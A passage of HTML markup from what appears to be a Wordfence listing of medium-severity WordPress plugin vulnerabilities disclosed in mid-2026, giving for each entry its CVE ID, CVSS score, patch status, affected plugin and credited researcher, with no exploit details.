			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/mycred" target="_blank" rel="noopener">Points Management System For Gamification, Ranks, Badges, and Loyalty Rewards Program – myCred</a> <span class="wfvr-software-slug">[mycred]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/riyas-m-s" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/f36c6f9e5c03ad8f37eb6faab59d90d8.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="f36c6f9e5c03ad8f37eb6faab59d90d8"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/riyas-m-s" target="_blank" rel="noopener">Riyas M S</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/95d9995a-d99e-4136-84f9-1d3dfc4a4bf0" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/16187b39-9b3a-4b1c-806c-37b62483a719" target="_blank" rel="noopener">RealHomes Memberships &lt;= 3.0.9 &#8211; Missing Authorization to Authenticated (Subscriber+) Membership Payment Bypass via &#8216;ims_add_paypal_recurring_membership&#8217; AJAX Action</a></h4>
<div class="cvss-score-badge">4.3</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>4.3 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-10782" target="_blank" rel="noopener noreferrer">							CVE-2026-10782						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Jul 31, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/inspiry-memberships" target="_blank" rel="noopener">RealHomes Memberships</a> <span class="wfvr-software-slug">[inspiry-memberships]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/yong-jin-lim" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/85f293dee3eecb01177cc42abdc331b1.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="85f293dee3eecb01177cc42abdc331b1"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/yong-jin-lim" target="_blank" rel="noopener">dyingman</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/16187b39-9b3a-4b1c-806c-37b62483a719" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/955d2b8d-af39-43f9-a513-7cc421cbd4b5" target="_blank" rel="noopener">RT Mega Menu – Mega Menu Builder for Elementor &amp; Gutenberg &lt;= 1.5.1 &#8211; Missing Authorization</a></h4>
<div class="cvss-score-badge">4.3</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>4.3 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-65433" target="_blank" rel="noopener noreferrer">							CVE-2026-65433						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Jul 27, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/rt-mega-menu" target="_blank" rel="noopener">RT Mega Menu – Mega Menu Builder for Elementor &amp; Gutenberg</a> <span class="wfvr-software-slug">[rt-mega-menu]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/luc" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/00000000000000000000000000000000.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="00000000000000000000000000000000"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/luc" target="_blank" rel="noopener">luc</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/955d2b8d-af39-43f9-a513-7cc421cbd4b5" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/cfa8aaf8-10c8-4024-8223-6218963012d2" target="_blank" rel="noopener">Search Atlas SEO – Premier SEO Plugin for One-Click WP Publishing &amp; Integrated AI Optimization &lt; 2.6.12 &#8211; Missing Authorization</a></h4>
<div class="cvss-score-badge">4.3</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>4.3 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-15252" target="_blank" rel="noopener noreferrer">							CVE-2026-15252						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Jul 30, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/metasync" target="_blank" rel="noopener">Search Atlas SEO – Premier SEO Plugin for One-Click WP Publishing &amp; Integrated AI Optimization</a> <span class="wfvr-software-slug">[metasync]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/levinitycyber" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/0203e07dd2cfa312f294f9391bdec1e8.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="0203e07dd2cfa312f294f9391bdec1e8"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/levinitycyber" target="_blank" rel="noopener">LevinityCyber</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/cfa8aaf8-10c8-4024-8223-6218963012d2" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/75d5c684-090e-4fff-9bf7-2b7c41ef95d3" target="_blank" rel="noopener">ShopLentor &lt;= 3.4.5 &#8211; Insecure Direct Object Reference to Authenticated (Contributor+) Sensitive Information Exposure via &#8216;optionSection&#8217; Parameter</a></h4>
<div class="cvss-score-badge">4.3</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>4.3 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-16797" target="_blank" rel="noopener noreferrer">							CVE-2026-16797						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Jul 27, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/woolentor-addons" target="_blank" rel="noopener">ShopLentor – All-in-One WooCommerce Growth &amp; Store Enhancement Plugin</a> <span class="wfvr-software-slug">[woolentor-addons]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/prism" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/b0bd54077fbac807142b902c61d6430c.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="b0bd54077fbac807142b902c61d6430c"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/prism" target="_blank" rel="noopener">Wordfence PRISM</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/75d5c684-090e-4fff-9bf7-2b7c41ef95d3" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/f5a7aa18-b6a9-4cd1-a502-25c0888ac227" target="_blank" rel="noopener">ShopLentor Pro &lt;= 2.8.5 &#8211; Missing Authorization</a></h4>
<div class="cvss-score-badge">4.3</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>4.3 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-61973" target="_blank" rel="noopener noreferrer">							CVE-2026-61973						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Aug 1, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/woolentor-addons-pro" target="_blank" rel="noopener">ShopLentor Pro</a> <span class="wfvr-software-slug">[woolentor-addons-pro]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/ananda-dhakal" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/00000000000000000000000000000000.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="00000000000000000000000000000000"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/ananda-dhakal" target="_blank" rel="noopener">Ananda Dhakal</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/f5a7aa18-b6a9-4cd1-a502-25c0888ac227" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/e98d4f04-74cd-486f-bb2f-fad76895f386" target="_blank" rel="noopener">Survey Form Block &lt;= 1.0.1 &#8211; Missing Authorization to Authenticated (Subscriber+) Survey Submission Data Export</a></h4>
<div class="cvss-score-badge">4.3</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>4.3 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-5626" target="_blank" rel="noopener noreferrer">							CVE-2026-5626						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Jul 28, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/survey-form-block" target="_blank" rel="noopener">Survey Form Block – collect answers and insights from your audience</a> <span class="wfvr-software-slug">[survey-form-block]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/itthidej-aramsri" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/048e7871de77533583773e0172b337bc.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="048e7871de77533583773e0172b337bc"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/itthidej-aramsri" target="_blank" rel="noopener">Itthidej Aramsri (Boeing777)</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/e98d4f04-74cd-486f-bb2f-fad76895f386" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/bea4b2c6-f078-4b47-b4d3-16216a54c0ab" target="_blank" rel="noopener">Sync Post With Other Site &lt; 1.9.3 &#8211; Missing Authorization</a></h4>
<div class="cvss-score-badge">4.3</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>4.3 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-14923" target="_blank" rel="noopener noreferrer">							CVE-2026-14923						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Jul 30, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/sync-post-with-other-site" target="_blank" rel="noopener">Sync Post With Other Site</a> <span class="wfvr-software-slug">[sync-post-with-other-site]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/shikhali-jamalzade" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/ead6eac6aef4e9f4e2d49ef7f41d9316.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="ead6eac6aef4e9f4e2d49ef7f41d9316"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/shikhali-jamalzade" target="_blank" rel="noopener">Shikhali Jamalzade</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/bea4b2c6-f078-4b47-b4d3-16216a54c0ab" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/1dd4e39a-9b2f-4728-b026-2dee60257c46" target="_blank" rel="noopener">Theme Editor &lt;= 3.1 &#8211; Cross-Site Request Forgery to CSS Modification</a></h4>
<div class="cvss-score-badge">4.3</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>4.3 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2025-14469" target="_blank" rel="noopener noreferrer">							CVE-2025-14469						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Jul 31, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/theme-editor" target="_blank" rel="noopener">Theme Editor</a> <span class="wfvr-software-slug">[theme-editor]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/nabil-irawan" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/86a1429aeb8e473ec62cf8dd3d4e4571.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="86a1429aeb8e473ec62cf8dd3d4e4571"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/nabil-irawan" target="_blank" rel="noopener">Nabil Irawan</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/1dd4e39a-9b2f-4728-b026-2dee60257c46" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/b75789ff-6050-4044-a3ff-d071591b4ec6" target="_blank" rel="noopener">Tutor LMS – eLearning and online course solution &lt; 4.0.0 &#8211; Missing Authorization</a></h4>
<div class="cvss-score-badge">4.3</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>4.3 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-14310" target="_blank" rel="noopener noreferrer">							CVE-2026-14310						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Jul 30, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/tutor" target="_blank" rel="noopener">Tutor LMS – eLearning and online course solution</a> <span class="wfvr-software-slug">[tutor]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/sanjar-tulkinov" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/d4ffc641ce84aa2161a00a010cfc1d18.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="d4ffc641ce84aa2161a00a010cfc1d18"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/sanjar-tulkinov" target="_blank" rel="noopener">Sanjar Tulkinov</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/b75789ff-6050-4044-a3ff-d071591b4ec6" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/50ac89bd-43fc-4b21-8d29-b320d7aa587b" target="_blank" rel="noopener">User Profile Picture &lt;= 2.6.3 &#8211; Authenticated (Author+) Insecure Direct Object Reference</a></h4>
<div class="cvss-score-badge">4.3</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>4.3 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-61971" target="_blank" rel="noopener noreferrer">							CVE-2026-61971						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Jul 31, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/metronet-profile-picture" target="_blank" rel="noopener">User Profile Picture</a> <span class="wfvr-software-slug">[metronet-profile-picture]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/ananda-dhakal" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/00000000000000000000000000000000.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="00000000000000000000000000000000"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/ananda-dhakal" target="_blank" rel="noopener">Ananda Dhakal</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/50ac89bd-43fc-4b21-8d29-b320d7aa587b" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/5d386d25-d228-4491-b58d-6adbb3b863a5" target="_blank" rel="noopener">Vimeo &lt;= 1.2.2 &#8211; Authenticated (Subscriber+) Information Exposure</a></h4>
<div class="cvss-score-badge">4.3</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>4.3 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-65543" target="_blank" rel="noopener noreferrer">							CVE-2026-65543						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="unpatched"><br />
						Unpatched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Jul 28, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/vimeo" target="_blank" rel="noopener">Vimeo</a> <span class="wfvr-software-slug">[vimeo]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/0xzenko" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/00000000000000000000000000000000.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="00000000000000000000000000000000"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/0xzenko" target="_blank" rel="noopener">0xzenko</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/5d386d25-d228-4491-b58d-6adbb3b863a5" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/40535215-9f82-4324-8b02-8f3e2ea82940" target="_blank" rel="noopener">WP Maps – Google Maps,OpenStreetMap,Mapbox,Store Locator,Listing,Directory &amp; Filters &lt;= 4.9.6 &#8211; Authenticated (Subscriber+) Information Exposure</a></h4>
<div class="cvss-score-badge">4.3</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>4.3 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-28144" target="_blank" rel="noopener noreferrer">							CVE-2026-28144						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Jul 31, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/wp-google-map-plugin" target="_blank" rel="noopener">WP Maps – Google Maps,OpenStreetMap,Mapbox,Store Locator,Listing,Directory &amp; Filters</a> <span class="wfvr-software-slug">[wp-google-map-plugin]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/ananda-dhakal" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/00000000000000000000000000000000.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="00000000000000000000000000000000"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/ananda-dhakal" target="_blank" rel="noopener">Ananda Dhakal</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/40535215-9f82-4324-8b02-8f3e2ea82940" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/f490dd2b-34d6-4e19-8788-d30ad0c67e95" target="_blank" rel="noopener">WP Travel – Ultimate Travel Booking System, Tour Management Engine &lt; 11.8.1 &#8211; Authenticated (Subscriber+) Insecure Direct Object Reference</a></h4>
<div class="cvss-score-badge">4.3</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>4.3 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-13145" target="_blank" rel="noopener noreferrer">							CVE-2026-13145						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Jul 30, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/wp-travel" target="_blank" rel="noopener">WP Travel – Ultimate Travel Booking System, Tour Management Engine</a> <span class="wfvr-software-slug">[wp-travel]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/revanth-hari-narayana-matte" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/8110ca50d15470d1569441aa4f6c445e.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="8110ca50d15470d1569441aa4f6c445e"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/revanth-hari-narayana-matte" target="_blank" rel="noopener">Revanth Hari Narayana Matte</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/f490dd2b-34d6-4e19-8788-d30ad0c67e95" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/3d7a544b-73a1-4883-a2d2-df42de08ff08" target="_blank" rel="noopener">YayPricing &lt;= 3.5.6 &#8211; Missing Authorization</a></h4>
<div class="cvss-score-badge">4.3</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>4.3 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-66442" target="_blank" rel="noopener noreferrer">							CVE-2026-66442						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Jul 27, 2026</strong>
			</div>
</p></div>
<div class="row">
